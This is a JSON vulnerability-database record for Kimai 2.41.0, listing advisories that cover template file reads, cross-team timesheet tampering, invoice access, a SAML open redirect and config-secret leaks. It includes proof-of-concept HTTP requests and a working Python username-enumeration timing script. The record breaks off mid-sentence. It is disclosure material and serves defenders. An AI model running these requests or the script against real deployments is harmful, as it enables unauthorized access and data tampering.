{"url":"http://public2.vulnerablecode.io/api/packages/926250?format=json","purl":"pkg:composer/kimai/kimai@2.41.0","type":"composer","namespace":"kimai","name":"kimai","version":"2.41.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.56.0","latest_non_vulnerable_version":"2.56.0","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67670?format=json","vulnerability_id":"VCID-4a1w-d47t-y3df","summary":"Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SYSTE_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the sandboxed Twig render. This is forwarded to mPDF's SetAssociatedFiles(), whose writer calls file_get_contents($entry['path']) during PDF output and embeds the bytes as a FlateDecode stream in the PDF. Any file readable by the PHP worker is returned to the attacker inside the rendered invoice. This issue has been patched in version 2.56.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44298","reference_id":"","reference_type":"","scores":[{"value":"0.00078","scoring_system":"epss","scoring_elements":"0.23278","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44298"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44298","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44298"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.56.0","reference_id":"2.56.0","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:06:21Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.56.0"},{"reference_url":"https://github.com/advisories/GHSA-h5fh-7hwr-97mw","reference_id":"GHSA-h5fh-7hwr-97mw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-h5fh-7hwr-97mw"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw","reference_id":"GHSA-h5fh-7hwr-97mw","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-08T14:06:21Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-h5fh-7hwr-97mw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["CVE-2026-44298","GHSA-h5fh-7hwr-97mw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4a1w-d47t-y3df"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360415?format=json","vulnerability_id":"VCID-6as9-19am-2uga","summary":"Kimai has Missing Voter Check that Allows Cross-Team Timesheet Manipulation\n### Summary\n\nAny ROLE_TEAMLEAD user can enumerate, read, modify, and permanently delete timesheets belonging to any other user in the system — regardless of team membership. This enables data destruction (deleted billable hours), data tampering (forged timesheet durations), and full authorization bypass on timesheet resources. Verified against Kimai 2.52.0.\n\n### Details\n\n`TimesheetVoter::voteOnAttribute()` maps permissions to `own_timesheet` or `other_timesheet` without checking team membership. The voter's own comment confirms this is a known gap:\n\n```php\n// extend me for \"team\" support later on\nif ($subject->getUser()?->getId() === $user->getId()) {\n $permission .= 'own';\n} else {\n $permission .= 'other';\n}\n```\n\n### PoC\n\nTested against Kimai 2.52.0 Docker instance.\n\nSetup:\n- User A (usera, ROLE_TEAMLEAD) owns timesheet ID 2 with description \"Private timesheet - UserA only\"\n- User B (userb, ROLE_TEAMLEAD) is NOT on any team with User A\n\n**User B reads User A's timesheet data:**\n\n```\nGET /api/timesheets/2 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: \n```\n\nResponse: HTTP 200 — returns full timesheet record including description \"Private timesheet - UserA only\".\n\n**User B deletes User A's timesheet:**\n\n```\nDELETE /api/timesheets/3 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: \n```\n\nResponse: HTTP 204 No Content — timesheet permanently deleted.\n\n**User B tampers User A's timesheet:**\n\n```\nPATCH /api/timesheets/6 HTTP/1.1\nX-AUTH-USER: userb\nX-AUTH-TOKEN: \nContent-Type: application/json\n\n{\"begin\":\"2026-03-24T08:00:00\",\"end\":\"2026-03-24T18:00:00\",\"project\":1,\"activity\":1,\"description\":\"TAMPERED\",\"exported\":false,\"billable\":false}\n```\n\nResponse: HTTP 200 OK — duration inflated from 3600s to 36000s, description overwritten.\n\n**Note:** ROLE_USER (userc) is correctly blocked — DELETE returns 403 and the actions endpoint returns an empty array. The vulnerability only affects ROLE_TEAMLEAD and above. Timesheet IDs are sequential integers, trivially enumerable.\n\n### Impact\n\nAny authenticated user with ROLE_TEAMLEAD or above can:\n\n1. Permanently delete timesheets belonging to any user system-wide — destroying billable hours, payroll data, and project billing history\n2. Silently alter timesheet descriptions, hours, and billing flags — forging hours up or down, directly affecting invoicing and payroll\n3. Enumerate all timesheet IDs (sequential integers) and access action metadata for arbitrary records\n\nNo user interaction required. ROLE_USER accounts are correctly restricted; the vulnerability is specific to ROLE_TEAMLEAD receiving global scope instead of team-scoped access.\n\n### Maintainers answer: why this is not eligible for a CVE\n\nThe behavior described matches the documented permission model. Per the Kimai documentation, the relevant permissions granted to `ROLE_TEAMLEAD` are:\n\n- `edit_other_timesheet` — Edit existing records of other users\n- `delete_other_timesheet` — Delete existing records of other users\n\nThese permissions were global by design, not team-scoped. The UI surfaces only the teamlead's own team timesheets, but the API has historically honored these permissions as documented: a role holding `*_other_timesheet` can act on any other user's timesheet. The inline comment `// extend me for \"team\" support later on` reflects this accurately — team-scoped enforcement was a planned enhancement, not a security control that existed and failed.\n\nThe report frames this as authorization bypass, but no authorization boundary is being crossed: `ROLE_TEAMLEAD` is operating within its documented permissions.\n\nKimai acknowledges that this behavior might not be expected, so while it will be treated as a feature request for team-scoped permission enforcement and not a vulnerability, it still track it as having security implications.\n\n### Solution\n\nTeam-scoped timesheet permission checks were added in 2.56.0.\n\nOperators of Kimai <= 2.55 who need stricter isolation between teamleads should not grant `ROLE_TEAMLEAD` to users who must not act on other teams' timesheets.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-9g2q-w3w2-vf7q","reference_id":"","reference_type":"","scores":[{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-9g2q-w3w2-vf7q"},{"reference_url":"https://github.com/advisories/GHSA-9g2q-w3w2-vf7q","reference_id":"GHSA-9g2q-w3w2-vf7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-9g2q-w3w2-vf7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/375853?format=json","purl":"pkg:composer/kimai/kimai@2.56.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.56.0"}],"aliases":["GHSA-9g2q-w3w2-vf7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6as9-19am-2uga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/69152?format=json","vulnerability_id":"VCID-8vkc-r8z8-7ugb","summary":"Kimai is a web-based multi-user time-tracking application. Prior to version 2.51.0, \"GET /api/invoices/{id}\" only checks the role-based view_invoice permission but does not verify the requesting user has access to the invoice's customer. Any user with ROLE_TEAMLEAD (which grants view_invoice) can read all invoices in the system, including those belonging to customers assigned to other teams. This issue has been patched in version 2.51.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28685","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03085","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28685"},{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/releases/tag/2.51.0","reference_id":"2.51.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/releases/tag/2.51.0"},{"reference_url":"https://github.com/kimai/kimai/commit/a0601c8cb28fed1cca19051a8272425069ab758f","reference_id":"a0601c8cb28fed1cca19051a8272425069ab758f","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/commit/a0601c8cb28fed1cca19051a8272425069ab758f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28685","reference_id":"CVE-2026-28685","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28685"},{"reference_url":"https://github.com/advisories/GHSA-v33r-r6h2-8wr7","reference_id":"GHSA-v33r-r6h2-8wr7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v33r-r6h2-8wr7"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-v33r-r6h2-8wr7","reference_id":"GHSA-v33r-r6h2-8wr7","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-09T19:46:43Z/"}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-v33r-r6h2-8wr7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40197?format=json","purl":"pkg:composer/kimai/kimai@2.51.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kahk-zqmm-zka9"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-nxtw-3hcs-mydx"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"},{"vulnerability":"VCID-ys8u-pn7h-ayc7"},{"vulnerability":"VCID-zfjd-s5wk-eqbz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.51.0"}],"aliases":["CVE-2026-28685","GHSA-v33r-r6h2-8wr7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8vkc-r8z8-7ugb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359828?format=json","vulnerability_id":"VCID-h9gw-dwmf-mfap","summary":"Kimai: Username enumeration via timing on X-AUTH-USER\n## Details\n\n`src/API/Authentication/TokenAuthenticator.php` calls `loadUserByIdentifier()` first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases (`{\"message\":\"Invalid credentials\"}`, HTTP 403), so the leak is purely timing.\n\nThe `/api/*` firewall has no `login_throttling` configured, so the probe is unbounded.\n\nThe legacy `X-AUTH-USER` / `X-AUTH-TOKEN` headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.\n\n## Proof of concept\n\n```python\n#!/usr/bin/env python3\n\"\"\"Kimai username enumeration via X-AUTH-USER timing oracle.\"\"\"\n\nimport argparse\nimport ssl\nimport statistics\nimport sys\nimport time\nimport urllib.error\nimport urllib.request\n\nPROBE_PATH = \"/api/users/me\"\nBASELINE_USER = \"baseline_no_such_user_zzz\"\nDUMMY_TOKEN = \"x\" * 32\n\n\ndef probe(url, user, ctx):\n req = urllib.request.Request(\n url + PROBE_PATH,\n headers={\"X-AUTH-USER\": user, \"X-AUTH-TOKEN\": DUMMY_TOKEN},\n )\n t0 = time.perf_counter()\n try:\n urllib.request.urlopen(req, context=ctx, timeout=10).read()\n except urllib.error.HTTPError as e:\n e.read()\n return (time.perf_counter() - t0) * 1000.0\n\n\ndef median_ms(url, user, samples, ctx):\n return statistics.median(probe(url, user, ctx) for _ in range(samples))\n\n\ndef load_candidates(path):\n with open(path) as f:\n return [ln.strip() for ln in f if ln.strip() and not ln.startswith(\"#\")]\n\n\ndef main():\n ap = argparse.ArgumentParser(description=__doc__.strip())\n ap.add_argument(\"-u\", \"--url\", required=True,\n help=\"base URL, e.g. https://kimai.example\")\n ap.add_argument(\"-l\", \"--list\", required=True, metavar=\"FILE\",\n help=\"one candidate username per line\")\n ap.add_argument(\"-t\", \"--threshold\", type=float, default=15.0, metavar=\"MS\",\n help=\"median delta over baseline that flags a real user\")\n ap.add_argument(\"-n\", \"--samples\", type=int, default=15)\n ap.add_argument(\"--verify-tls\", action=\"store_true\")\n args = ap.parse_args()\n\n url = args.url.rstrip(\"/\")\n ctx = None if args.verify_tls else ssl._create_unverified_context()\n candidates = load_candidates(args.list)\n\n baseline = median_ms(url, BASELINE_USER, args.samples, ctx)\n print(f\"baseline: {baseline:.1f} ms\", file=sys.stderr)\n\n width = max(len(u) for u in candidates)\n print(f\"{'username':<{width}} {'median':>8} {'delta':>8} verdict\")\n print(\"-\" * (width + 30))\n for user in candidates:\n m = median_ms(url, user, args.samples, ctx)\n delta = m - baseline\n verdict = \"REAL\" if delta > args.threshold else \"-\"\n print(f\"{user:<{width}} {m:>6.1f}ms {delta:>+6.1f}ms {verdict}\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\nUsage:\n\n```\n$ ./timing_oracle.py -u https://target -l users.txt -n 15\n[*] calibrating baseline with 15 samples\n[*] baseline median: 37.7 ms\n[*] probing 13 candidates (n=15, threshold=15.0 ms)\n\nusername median delta verdict\n----------------------------------------------------------\nuser1@example.com 64.2ms +26.5ms REAL\nuser2@example.com 72.4ms +34.7ms REAL\nuser3@example.com 70.0ms +32.3ms REAL\ntester.nonexistent@example.com 37.2ms -0.5ms -\nadmin 63.6ms +25.9ms REAL\nadministrator 38.2ms +0.4ms -\nroot 37.3ms -0.4ms -\ntest 33.6ms -4.1ms -\ndemo 38.2ms +0.5ms -\nkimai 37.0ms -0.7ms -\nnonexistent_user_aaa 38.1ms +0.4ms -\nnonexistent_user_bbb 37.5ms -0.2ms -\nnonexistent_user_ccc 38.4ms +0.7ms -\n```\n\nIn this run, four real accounts were identified out of thirteen candidates with no false positives or false negatives. Probing took roughly five seconds per username at fifteen samples each.\n\n## Fix\n\nIn `TokenAuthenticator::authenticate()`, run the password hasher against a fixed dummy hash when the user is not found, so the response time does not depend on user existence:\n\n```php\nprivate const DUMMY_HASH = '$argon2id$v=19$m=65536,t=4,p=1$ZHVtbXlzYWx0ZHVtbXk$YQ4N4lU0Sg9hRT2KhRGwLp7y4VZqkM5KQ8wYJ5HtoX0';\n\ntry {\n $user = $this->userProvider->loadUserByIdentifier($credentials['username']);\n} catch (UserNotFoundException $e) {\n $this->passwordHasherFactory\n ->getPasswordHasher(User::class)\n ->verify(self::DUMMY_HASH, $credentials['password']);\n throw $e;\n}\n```\n\nThe dummy hash must use the same algorithm and parameters as real user hashes so that `verify()` consumes equivalent CPU. Generate it once with `password_hash('dummy', PASSWORD_ARGON2ID)` and pin it as a constant.\n\n## Relevance\n\nThe practical security impact is very limited. The response body and HTTP status are identical, and the only observable difference is a relatively small timing gap, which is even less relevant when the requests is executed against a network instead of a local installation. In addition, [this authentication method has already been deprecated since April 2024 and is scheduled for removal after Q2 2026](https://www.kimai.org/en/blog/2026/removing-api-passwords), so the issue only affects a legacy mechanism that is already being phased out. ","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-jrc6-fmhw-fpq2"},{"reference_url":"https://github.com/advisories/GHSA-jrc6-fmhw-fpq2","reference_id":"GHSA-jrc6-fmhw-fpq2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jrc6-fmhw-fpq2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373714?format=json","purl":"pkg:composer/kimai/kimai@2.54.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-kjkh-andk-qqa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.54.0"}],"aliases":["GHSA-jrc6-fmhw-fpq2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h9gw-dwmf-mfap"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359943?format=json","vulnerability_id":"VCID-kahk-zqmm-zka9","summary":"Kimai has an Open Redirect via Unvalidated RelayState in SAML ACS Handler\n### Summary\n\nThe SAML authentication success handler in Kimai returns the `RelayState` POST parameter as a redirect destination without validating the host or scheme. After a user successfully authenticates via SAML, they are redirected to an attacker-controlled URL if the IdP includes a malicious `RelayState` value. This enables phishing attacks that steal credentials or session tokens post-SSO.\n\n*Requires SAML to be enabled (non-default configuration).*\n\n### Details\n\nVulnerable file: `src/Saml/Security/SamlAuthenticationSuccessHandler.php`\n\n```php\n// Line 27-33\n$relayState = $request->request->get('RelayState', $request->query->get('RelayState'));\nif (\\is_scalar($relayState)) {\n $relayState = (string) $relayState;\n if ($relayState !== $this->httpUtils->generateUri($request, (string) $this->options['login_path'])) {\n return $relayState; // No host/scheme validation — any URL accepted\n }\n}\n```\n\nThe only check is that `RelayState` does not equal the configured `login_path`. Any external URL (e.g., `https://attacker.com`) passes this check and is returned as the redirect destination.\n\nThe existing unit test `SamlAuthenticationSuccessHandlerTest::testRelayState()` confirms this behavior — an absolute URL in `RelayState` results in a redirect to that URL with no restriction.\n\n### Steps to Reproduce\n\n```\n1. Enable SAML authentication in Kimai\n2. Configure a SAML IdP (e.g., SimpleSAMLphp)\n3. Initiate IdP-initiated SSO with RelayState=https://attacker.com\n — or intercept the ACS POST and modify RelayState to https://attacker.com\n4. Complete SAML authentication at the IdP\n5. Observe: after the SAMLResponse POST to /saml/acs, Kimai issues:\n HTTP/1.1 302 Found\n Location: https://attacker.com\n```\n\nCode-confirmed via unit test (`testRelayState`): `onAuthenticationSuccess` with `RelayState=http://localhost/relayed` redirects directly to that URL. External URLs follow the same code path.\n\n### Impact\n\nWhile this bug exists it has low practical possibilities and the attacker needs to be able to create a SAML request, meaning either admin access to an IdP supporting such an action OR access to the private SAML keys / certificates.\n\nIn other words: only exploitable in IdP-initiated SSO flows where the IdP includes a `RelayState` value supplied by the attacker (e.g., via a malicious link to the IdP).\n\n### Fix\n\nThe `RelayState` is validated before redirecting, see #5878\n\n- It may not contain a host or port and cannot start with `//`. \n- If it contains a host, it must match the current host.","references":[{"reference_url":"https://github.com/kimai/kimai","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai"},{"reference_url":"https://github.com/kimai/kimai/pull/5878","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/pull/5878"},{"reference_url":"https://github.com/kimai/kimai/security/advisories/GHSA-3jp4-mhh4-gcgr","reference_id":"","reference_type":"","scores":[{"value":"0.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/kimai/kimai/security/advisories/GHSA-3jp4-mhh4-gcgr"},{"reference_url":"https://github.com/advisories/GHSA-3jp4-mhh4-gcgr","reference_id":"GHSA-3jp4-mhh4-gcgr","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-3jp4-mhh4-gcgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373484?format=json","purl":"pkg:composer/kimai/kimai@2.53.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4a1w-d47t-y3df"},{"vulnerability":"VCID-6as9-19am-2uga"},{"vulnerability":"VCID-h9gw-dwmf-mfap"},{"vulnerability":"VCID-kjkh-andk-qqa6"},{"vulnerability":"VCID-qvcx-4wyw-4uba"},{"vulnerability":"VCID-we4j-21ku-9yf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/kimai/kimai@2.53.0"}],"aliases":["GHSA-3jp4-mhh4-gcgr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kahk-zqmm-zka9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360362?format=json","vulnerability_id":"VCID-kjkh-andk-qqa6","summary":"Kimai's Twig function config() leaks server-wide secrets (LDAP bind password, SAML SP private key) via invoice/export templates\n### Summary\n\nKimai's Twig sandbox (`StrictPolicy`, used for admin-uploaded invoice and export templates) allow-lists the `config()` Twig function with no key filtering. `config(name)` delegates to `App\\Configuration\\SystemConfiguration::find($name)`, which returns arbitrary entries from the flattened `kimai.config` container parameter built in `App\\DependencyInjection\\AppExtension::loadInternal()`. Any admin who can upload a Twig template can therefore render server-wide secrets - the LDAP bind password, the SAML SP private key, and any other dotted configuration key populated from `kimai.yaml` - into the invoice or export output, which is then delivered to whoever generates an invoice or export from that template (including lower-privileged users such as teamleads with invoice permissions). This is a second, uncovered class of the same defense-in-depth issue patched in GHSA-rh42-6rj2-xwmc: the previous fix added a User-method blocklist but left the `config()` function unrestricted.\n\n### Details\n\n`src/Twig/SecurityPolicy/StrictPolicy.php:40-55` explicitly allow-lists `'config'`:\n\n```php\nprivate array $allowedFunctions = [\n 'max', 'min', 'range', 'constant', 'cycle', 'random', 'date',\n 't',\n 'encore_entry_css_source', 'encore_entry_link_tags', 'encore_entry_script_tags',\n 'is_granted',\n 'qr_code_data_uri',\n 'config', // <-- sink, no key filter\n 'create_date', 'month_names', 'locale_format',\n 'class_name'\n];\n```\n\n`src/Twig/Configuration.php:22-45` is the Twig function implementation:\n\n```php\npublic function getFunctions(): array\n{\n return [new TwigFunction('config', [$this, 'get'])];\n}\n\npublic function get(string $name)\n{\n switch ($name) {\n case 'chart-class': return '';\n case 'theme.chart.background_color': return '#3c8dbc';\n // ... 4 more theme constants\n }\n return $this->configuration->find($name); // <-- arbitrary key lookup\n}\n```\n\n`App\\Configuration\\SystemConfiguration::find()` at `src/Configuration/SystemConfiguration.php:54-62` is a direct dictionary lookup. The dictionary `$this->settings` is initialised from the `kimai.config` container parameter, which the `AppExtension` flattens from `kimai.yaml` into dotted-notation keys.\n```\n\nThe LDAP and SAML schemas declared in `src/DependencyInjection/Configuration.php` define secret-valued scalar nodes that survive the flattening and become reachable keys:\n\n```php\n// getLdapNode()\n->arrayNode('connection')\n ->children()\n ->scalarNode('host')->defaultNull()->end()\n ->scalarNode('username')->end()\n ->scalarNode('password')->end() // -> settings['ldap.connection.password']\n ...\n\n// getSamlNode()\n->arrayNode('sp')\n ->children()\n ->scalarNode('x509cert')->end()\n ->scalarNode('privateKey')->end() // -> settings['saml.connection.sp.privateKey']\n ...\n```\n\nThe invoice and export renderers both enable the sandbox against `StrictPolicy` and pass the shared Twig environment - the one with the `config` function registered - into sandboxed rendering: `src/Invoice/Renderer/AbstractTwigRenderer.php:66-74` and `src/Export/Base/{PDFRenderer,HtmlRenderer}.php`. An admin who uploads a malicious invoice or export template therefore gets an unrestricted read primitive against `kimai.config`.\n\nIn a real deployment the attacker template is uploaded through the admin UI (ROLE_SUPER_ADMIN, permission `upload_invoice_template`), saved by `src/Invoice/InvoiceTemplate*` and later rendered by whoever generates an invoice or export for that template. The rendering user is typically a teamlead or admin with invoice permission (`INVOICE` permission set: `['view_invoice','create_invoice','manage_invoice_template']`, granted to ROLE_ADMIN and ROLE_TEAMLEAD in `config/packages/kimai.yaml`). The rendered output is returned as the invoice PDF/HTML or as a CSV/XLSX export, so the secrets land in a document that is routinely downloaded and emailed.\n\n### Impact\n\nAny Kimai deployment that (a) has SAML or LDAP configured in `kimai.yaml`, and (b) has at least one user (other than the current SUPER_ADMIN) who will render a template-based invoice or export in the future, is affected. A malicious or compromised SUPER_ADMIN can upload a template once, leave, and subsequent invoice or export generations by teamleads or other admins silently exfiltrate `ldap.connection.password`, `saml.connection.sp.privateKey`, `saml.connection.sp.x509cert`, and any other dotted configuration key into an attacker-readable artifact. The LDAP bind password gives domain-credential access to the company directory and often to every downstream system that trusts the same directory; the SAML SP private key allows an attacker to forge signed SAML assertions to any service provider that trusts the same key pair. This is the same class of defense-in-depth leak that GHSA-rh42-6rj2-xwmc patched for user-level secrets, at a broader impact because the keys leaked here are system-wide rather than per-user, and the current StrictPolicy does not intercept the `config()` call path. \n\n### Solution\n\nThe `config()` function was patched to only return a pre-configured list of settings in sandboxed mode. \n\nAdditional checks were added to prevent access to configs that start with `saml.` or `ldap.`.\n\nKimai will not issue a CVE, because this requires a SUPER_ADMIN account and it only affects system with activated LDAP or SAML, which also uses the invoice 